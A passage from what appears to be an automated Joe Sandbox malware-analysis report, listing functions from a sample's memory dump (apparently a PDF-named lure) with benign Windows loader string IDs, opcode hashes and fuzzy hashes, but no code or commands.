                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                              • API String ID: 0-118005554
                              • Opcode ID: 117af3007cb4cc793a384050d1617bca811d30e22843cc0f6df4555a32cb36e8
                              • Instruction ID: c86b39d23a4cbe97e938346fffa0b8d0930fe5f668233f4e64890c89ec0da051
                              • Opcode Fuzzy Hash: 117af3007cb4cc793a384050d1617bca811d30e22843cc0f6df4555a32cb36e8
                              • Instruction Fuzzy Hash: B231DA752087809FD701CB68D854B2AB7E4EFC5718F000869EC54CB392EF70D945CBA2
                              Function 32BC33D0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                              Download Yara Rule
                              Strings
                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 32C0289F
                              • RtlpInitializeAssemblyStorageMap, xrefs: 32C0289A
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                              • API String ID: 0-2653619699
                              • Opcode ID: 9dec677e71e96cf2a8a7a67bf17031bef5eed064fe8378352724b14fcc45ab8b
                              • Instruction ID: 30145dcbb8f646734614c550f52828ec9ce6b6a11e049dbbf371400f8a428649
                              • Opcode Fuzzy Hash: 9dec677e71e96cf2a8a7a67bf17031bef5eed064fe8378352724b14fcc45ab8b
                              • Instruction Fuzzy Hash: F7110276B04224ABF7198A48CC81F5B77ACDFC8758F548069B904EB244DA74CE009BB5
                              Function 32BCA4F0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID: Cleanup Group$Threadpool!
                              • API String ID: 2994545307-4008356553
                              • Opcode ID: 515fd9837d7d5c4f30aae1778e59a71a88f4880a0cd73c1820c54e71080bf247
                              • Instruction ID: 59505252d7757462013d1c1942e7f573f20a6b372ea5fecafc32b99083495082
                              • Opcode Fuzzy Hash: 515fd9837d7d5c4f30aae1778e59a71a88f4880a0cd73c1820c54e71080bf247
                              • Instruction Fuzzy Hash: 4B01DCB2164784EFE311DF24CD05F6277E8EB40B19F008A79B658C7A91EB34E914CB46
                              Function 32B9C6E0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: MUI
                              • API String ID: 0-1339004836
                              • Opcode ID: d914abf046636eb8e819dc483f2e02c0c42cc58c44f8985b7fce081daf98b590
                              • Instruction ID: 95f357902105724fdd46192cff8d4662a280bfcead8e9fa057ffac89a3fbb1b6
                              • Opcode Fuzzy Hash: d914abf046636eb8e819dc483f2e02c0c42cc58c44f8985b7fce081daf98b590
                              • Instruction Fuzzy Hash: 7E825A79E003298FEB14DFA9C880BEDB7B1FF49354F50817AD859AB290DB709985CB50
                              Function 32B964F0 Relevance: 1.9, APIs: 1, Instructions: 383COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 94b407e4d7972e0ee1a12bdd9be34fb61c3e8186a01f76a333928f7630833662
                              • Instruction ID: 284867f738157a6bc2c9f71942425a3189623967c3463ec589c9c5d60d26f223
                              • Opcode Fuzzy Hash: 94b407e4d7972e0ee1a12bdd9be34fb61c3e8186a01f76a333928f7630833662
                              • Instruction Fuzzy Hash: 69E19C74608351CFD304CF28C090A9ABBE0FF89358F158A6EE99987351DB31E906CF92
                              Function 32B91051 Relevance: 1.8, APIs: 1, Instructions: 259timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: a16cd9621be770a60fd162b3bbe6d96452681e62d13da0ead817f3a4d4b5da4e
                              • Instruction ID: 5ebf004a1c0c6d7f77b08b116dc303b651fad684fea365d915095760f122d559
                              • Opcode Fuzzy Hash: a16cd9621be770a60fd162b3bbe6d96452681e62d13da0ead817f3a4d4b5da4e
                              • Instruction Fuzzy Hash: 84B110B56093909FD354CF28C480A5AFBF1FB88744F14896EF89A97352D771E885CB82
                              Function 32B94779 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: a728bebf34920ba117f6bbdb83de0a1a7d7499b21ae3da71a11a9c4ceea6423b
                              • Instruction ID: a89bcdfafeba27f4ccc2635fc16474e230333c0d4d18e4909d40229b686d3eee
                              • Opcode Fuzzy Hash: a728bebf34920ba117f6bbdb83de0a1a7d7499b21ae3da71a11a9c4ceea6423b
                              • Instruction Fuzzy Hash: 5441CEB46043918FE714CF28D894B6ABBFAEF81394F50493DE9418B2A1DB70E855CB91
                              Function 32B8B420 Relevance: 1.6, APIs: 1, Instructions: 100timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: 05f893c444f0deb2215792894a142498772636c68c5526b1655e746a6243d78b
                              • Instruction ID: b6ebe23cdb0febb556aaa6338dbf8cc6cfbd6091fa579a4b5e0ea480cef2bff7
                              • Opcode Fuzzy Hash: 05f893c444f0deb2215792894a142498772636c68c5526b1655e746a6243d78b
                              • Instruction Fuzzy Hash: 17316572100248AFD711CF24C880E5A77A5FF45364F188269ED698F2A2CB31ED42CBD0
                              Function 32B956E0 Relevance: 1.6, APIs: 1, Instructions: 92timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: 1da527133dd32c29f6d6d5b0abe9c73016d64f986be416fcd464322d9c86cf90
                              • Instruction ID: afa9e902e55d2cf26d54181be5b0fa71eb92d5e0e2367aa92233fdf5a6c140e1
                              • Opcode Fuzzy Hash: 1da527133dd32c29f6d6d5b0abe9c73016d64f986be416fcd464322d9c86cf90
                              • Instruction Fuzzy Hash: F231AB39615A15FFE7568B24CE90F99BBA6FF88344F405065EC0087B60DB76E930CB90
                              Function 32C3E750 Relevance: 1.6, APIs: 1, Instructions: 91timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: 9d8c8e84a848bedbc85048b75c223318e5d1a88642899198804e54d0b72c3616
                              • Instruction ID: 14cdd7f9262c666ba79abad204f15baa1c91a09b0283ab6f920b51aee1ca9ae0
                              • Opcode Fuzzy Hash: 9d8c8e84a848bedbc85048b75c223318e5d1a88642899198804e54d0b72c3616
                              • Instruction Fuzzy Hash: 6E31A07590A3018FC701DF19C540A5ABBE5FF89358F4489AEE988AB251D734DD05CFD2
                              Function 32C1A130 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: c0a1fc20a63532f2b3a1ffee1767771f681de028fa89d432ffba90a6f521af5c
                              • Instruction ID: 1c91d61fbe1107591b970d7110392861b95a46409499f09792d824e9a9cdf93f
                              • Opcode Fuzzy Hash: c0a1fc20a63532f2b3a1ffee1767771f681de028fa89d432ffba90a6f521af5c
                              • Instruction Fuzzy Hash: 5D019A3A101259EBDF028F84CC41EDA3F66FB4C794F068201FE18A6220C632E971EB80
                              Function 32B892AF Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID:
                              • API String ID: 3446177414-0
                              • Opcode ID: 247a729ff2d4a6c417e70e230447ad353981495ac48d4a4293a676e970344c39
                              • Instruction ID: 9394df5cdc259b73c536039338432c8c22e14ca421cccb71f4cf8b0db5567db6
                              • Opcode Fuzzy Hash: 247a729ff2d4a6c417e70e230447ad353981495ac48d4a4293a676e970344c39
                              • Instruction Fuzzy Hash: E9F0B432144B846BD731DF59CC04F9BBBFDEF84B10F14051DE94693691D6A1F909C660
                              Function 32BCA580 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: GlobalTags
                              • API String ID: 0-1106856819
                              • Opcode ID: 6223cb0ad64ed9fc86ac0761990e3ffaace730a9a5b352ea18d189a85bbd1d46
                              • Instruction ID: 14a095be9cb3db3bd77559f132c8823e8529cc2c9b43cbcd08ab010df345b8ac
                              • Opcode Fuzzy Hash: 6223cb0ad64ed9fc86ac0761990e3ffaace730a9a5b352ea18d189a85bbd1d46
                              • Instruction Fuzzy Hash: 23714DB5E003199FEF18CFA9D590A9DBBB1BF88354F20C52AE905E7244EB758941CF50
                              Function 32BA02F9 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: #%u
                              • API String ID: 0-232158463
                              • Opcode ID: 265a737f5a6b367900006d094ee76de511223bbf769a97aefb1799d236eb9186
                              • Instruction ID: 1ef414026f7fdbb4810288e018fa8b330a4901ebed8c276cbf4655fd273651c0
                              • Opcode Fuzzy Hash: 265a737f5a6b367900006d094ee76de511223bbf769a97aefb1799d236eb9186
                              • Instruction Fuzzy Hash: CA718975A04259AFDB05CFA8C990FAEB7F8EF08704F144065EA04E7251EB74E945CBA0
                              Function 32C1F42F Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: 1270eafa4ad1ecb009350c71943b8a0e3ef1f833ee4d24814bbdd6f6672cbea9
                              • Instruction ID: 2e0fc9433a1ac3c87f0d6faa2a47178c9bd40780345700d40674f970fbc56415
                              • Opcode Fuzzy Hash: 1270eafa4ad1ecb009350c71943b8a0e3ef1f833ee4d24814bbdd6f6672cbea9
                              • Instruction Fuzzy Hash: 0D5199B2608745AFE7218F14C842FABB7E8FF84754F400929F981D7291DBB5E904DBA1
                              Function 32BC41BB Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: c0e3eca1f6f8141910cf5131f1ecfd614971ec24af436a177c75329b0d2be675
                              • Instruction ID: bb3d9ec709f2c73e9bd4c9449e40b01ddb36f3dfd529149d486067d155811bd5
                              • Opcode Fuzzy Hash: c0e3eca1f6f8141910cf5131f1ecfd614971ec24af436a177c75329b0d2be675
                              • Instruction Fuzzy Hash: 39517B715057609FD320CF59C841E5BB7F8FF48710F00892AFA95976A0E7B4E904CB91
                              Function 32C0C3B0 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: BinaryHash
                              • API String ID: 0-2202222882
                              • Opcode ID: b54404838c7d19a6d513ae497d5b3ec01e326deef9bdeeb122bdcf42afa6301e
                              • Instruction ID: 31a9c2c6273bba699637bbb1b49ebc8b18f5d89ba19072710148451e384199ed
                              • Opcode Fuzzy Hash: b54404838c7d19a6d513ae497d5b3ec01e326deef9bdeeb122bdcf42afa6301e
                              • Instruction Fuzzy Hash: F54132B290056DABDB21DA90DC81FEEB77CEB44714F0085E5EA08A7151DB709F898FA4
                              Function 32C19429 Relevance: 1.4, Strings: 1, Instructions: 121COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: verifier.dll
                              • API String ID: 0-3265496382
                              • Opcode ID: c38fb364c1da51e68f1adf00f525024b23479eab0de57b0ad6833d8328d68f37
                              • Instruction ID: 0c7b0c68bd1ab39ec2de2f0d0556da9e41110071427baf0941e7c7ab67ef91f3
                              • Opcode Fuzzy Hash: c38fb364c1da51e68f1adf00f525024b23479eab0de57b0ad6833d8328d68f37
                              • Instruction Fuzzy Hash: F1312AB97003019FE7148F5C8852B26B7F5EB88794F90842AE906EF381EA719D81D750
                              Function 32BC7425 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: #
                              • API String ID: 0-1885708031
                              • Opcode ID: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                              • Instruction ID: f2608f8e81e20e63100ffa8aa352105a9467e2d67ce2c6276a66c89fda6808de
                              • Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
                              • Instruction Fuzzy Hash: 7841CEB5A00629DBEB14CF88C890FBEBBB9FF80745F40845AE944A7240DB70D941DB91
                              Function 32BC360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: Flst
                              • API String ID: 0-2374792617
                              • Opcode ID: 1a8339ef00d83824ace032954d2278fd9f2c8ecdbee54b818c94c3ad4bcdc1f5
                              • Instruction ID: 85185531faed4e4e6deab3dd619d548fa1447213d80e4ca34aaba4e6a2a51f0f
                              • Opcode Fuzzy Hash: 1a8339ef00d83824ace032954d2278fd9f2c8ecdbee54b818c94c3ad4bcdc1f5
                              • Instruction Fuzzy Hash: 2341A9B5609311DFD304CF18C580A16FBE8EB89714F90856EE459CB381DB71D986CBA2
                              Function 32B896E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID: DebugPrintTimes
                              • String ID: 3\w3\w
                              • API String ID: 3446177414-2928290266
                              • Opcode ID: 6b69526154c74edf08088c285ea95c3071b89d79cc69085b9633737965c428bd
                              • Instruction ID: 7c8e639ac1a066a703bb43953a11ad4868889fe6206d91971d8c60616681031d
                              • Opcode Fuzzy Hash: 6b69526154c74edf08088c285ea95c3071b89d79cc69085b9633737965c428bd
                              • Instruction Fuzzy Hash: CA21B07A900B90AFDB229F58C850B5A7BF5FB84B58F114829AA59AB740DF70DD01CB90
                              Function 32C0C6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID: BinaryName
                              • API String ID: 0-215506332
                              • Opcode ID: 1b5b1c58f21b277cac492f89ffd26617ef5efd448330905cc48d6b5c982aae33
                              • Instruction ID: cc406f7551d12bda381d99c79964ce1558b907427ba29d233ed1181fe6bfcf17
                              • Opcode Fuzzy Hash: 1b5b1c58f21b277cac492f89ffd26617ef5efd448330905cc48d6b5c982aae33
                              • Instruction Fuzzy Hash: 8D31F57A900619AFEB15CB5CC945EAFB7B4EF80B24F018129E900A7250DB70EF05CBE0
                              Function 32BE717A Relevance: .7, Instructions: 705COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7ece732cf4d8d3a6f3b16fc1d671a6df4360df166a46d40b9608e3dd9a26b6c6
                              • Instruction ID: 29b3f6f422a1c16abd3d8c522c30630409ca1901df613c19e3d952bcd319a37b
                              • Opcode Fuzzy Hash: 7ece732cf4d8d3a6f3b16fc1d671a6df4360df166a46d40b9608e3dd9a26b6c6
                              • Instruction Fuzzy Hash: D842A475A006268FDB08CF59D890AAEB7F2FF89354F14855DE952AB340DB34EC42DB90
                              Function 32BBB1E0 Relevance: .6, Instructions: 629COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2c30317af12fa27807ebf20b88abb01576672e6f59ab571133908a2b223bdbaa
                              • Instruction ID: 83b6f76909d7093ddc348f104dd8c6b4fdf73e8ad0a8f15d4a55df4685e0a16c
                              • Opcode Fuzzy Hash: 2c30317af12fa27807ebf20b88abb01576672e6f59ab571133908a2b223bdbaa
                              • Instruction Fuzzy Hash: D0327BB6E00259DBDF14CFA8D890BBEBBB1FF44748F144129EC05AB290EB759941CB90
                              Function 32BA2760 Relevance: .6, Instructions: 605COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000002.00000002.23643242091.0000000032B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32B60000, based on PE: true
                              • Associated: 00000002.00000002.23643242091.0000000032C89000.00000040.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000002.00000002.23643242091.0000000032C8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_32b60000_D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7baa6ec0099ae9d85423f7b440f33b203121b93f5044af8ea53f8e0e1849ab30
                              • Instruction ID: 24686a0a6f18c4d144275f3afdf5df55c46c2cb7f79773278ed0ad82cf9b9e9a
